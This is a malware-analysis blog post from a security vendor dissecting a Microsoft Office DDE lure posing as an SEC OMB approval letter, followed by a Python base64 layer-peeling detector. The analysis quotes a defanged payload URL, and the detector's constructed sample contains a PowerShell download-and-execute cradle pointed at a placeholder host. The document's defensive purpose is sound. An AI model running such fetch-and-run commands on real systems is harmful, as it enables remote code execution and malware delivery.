Microsoft Office DDE SEC OMB Approval Lure

Posted on 2017-10-14 by Pedram Amini

In reviewing the results of our Microsoft Office DDE malware hunt (Microsoft_Office_DDE_Command_Execution.rule), we came across an interesting lure posing as an SEC Office of Management and Budget (OMB) approval letter. The sample uses a few tricks to increase its chances of successful exploitation. We'll walk through the dissection of its components in this post. To follow the highlights of the conversation on Twitter, see the following moment:

The author of this payload applies a trick here: the PowerShell binary is referenced by way of Microsoft Word (first highlight). This results in a friendlier-looking dialog for the user:

[Figure: Dialogue Trick]

A potential victim is more likely to select 'Yes' here when the dialog names Microsoft Word as the referenced binary rather than powershell.exe. The payload sits behind a Google shortened URL. This is convenient, because appending a + to that URL shows the shortener's click statistics and therefore how prevalent this sample is:

[Figure: Google URL Stats]

It seems the sample is not popular at all, though the stats page may be worth keeping an eye on. The URL behind the shortener is:

http://ipangea[.]com/wp-content/themes/ps1.txt

Fetch that and you'll find base64-encoded content, apparently hosted on a compromised WordPress site (a common arrangement):

The payload establishes persistence via multiple locations in the Windows Registry, and also via WMI so that it executes during Windows logon. There's another payload to decode, same drill. Here's what we get:

You'll notice a number of base64-encoded strings above. No doubt this is another evasion tactic. If you dig into those, you'll see they are all password protected via HTTP authentication. InQuest detects exploitation of this and other DDE attacks via our Deep File Inspection (DFI) stack and the signature MC_Office_DDE_Command_Exec (event ID 5000728), released on October 10th, 2017. Our DFI stack is responsible for peeling away the variety of layers typically present in malicious content. The process is recursive, and a variety of techniques are applied in parallel to expose all embedded layers. For more information about DFI, see www.InQuest.net or reach out to us directly.
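As an added illustration of the "same drill" decoding described above (example code written for this post, not InQuest's DFI implementation), here is a small recursive base64 layer peeler: it finds base64 runs in a blob, decodes them as UTF-16LE (the PowerShell -EncodedCommand convention) or UTF-8, recurses into each decoded layer, and collects every URL it encounters. The two-stage sample payload, the example.invalid URL and the heuristics are constructed for the example and are not taken from the real sample.

```python
import base64
import binascii
import re

# Heuristics constructed for this example, not InQuest's rule logic.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")


def _as_text(raw):
    """Decode bytes as UTF-16LE (PowerShell -EncodedCommand) or UTF-8,
    accepting the result only if it is overwhelmingly printable ASCII."""
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        ascii_ok = sum(1 for c in text if 32 <= ord(c) < 127 or c in "\r\n\t")
        if text and ascii_ok / len(text) > 0.9:
            return text
    return None


def peel(blob, depth=0, max_depth=5):
    """Recursively decode every base64 run in blob. Returns a dict with
    'layers' (list of (depth, decoded text)) and 'urls' (set of URLs seen)."""
    found = {"layers": [], "urls": set(URL_RE.findall(blob))}
    if depth >= max_depth:  # bound recursion on hostile input
        return found
    for m in B64_RE.finditer(blob):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # alphanumeric run that is not real base64
        text = _as_text(raw)
        if text is None:
            continue  # binary or garbage, not a script layer
        found["layers"].append((depth + 1, text))
        inner = peel(text, depth + 1, max_depth)
        found["layers"].extend(inner["layers"])
        found["urls"].update(inner["urls"])
    return found


# Constructed sample mimicking the layering described above: a base64 text file
# whose decoded PowerShell carries a second, -EncodedCommand (UTF-16LE) stage.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/ps1.txt')"
STAGE1 = "powershell -EncodedCommand " + base64.b64encode(STAGE2.encode("utf-16-le")).decode()
SAMPLE = base64.b64encode(STAGE1.encode()).decode()


def analyze_sample():
    """Peel the constructed sample; layer 1 is STAGE1, layer 2 is STAGE2."""
    return peel(SAMPLE)
```

Running analyze_sample() yields two layers and the single stage URL; on a real sample, the URLs it surfaces are the ones to check for the HTTP-authentication gating noted above.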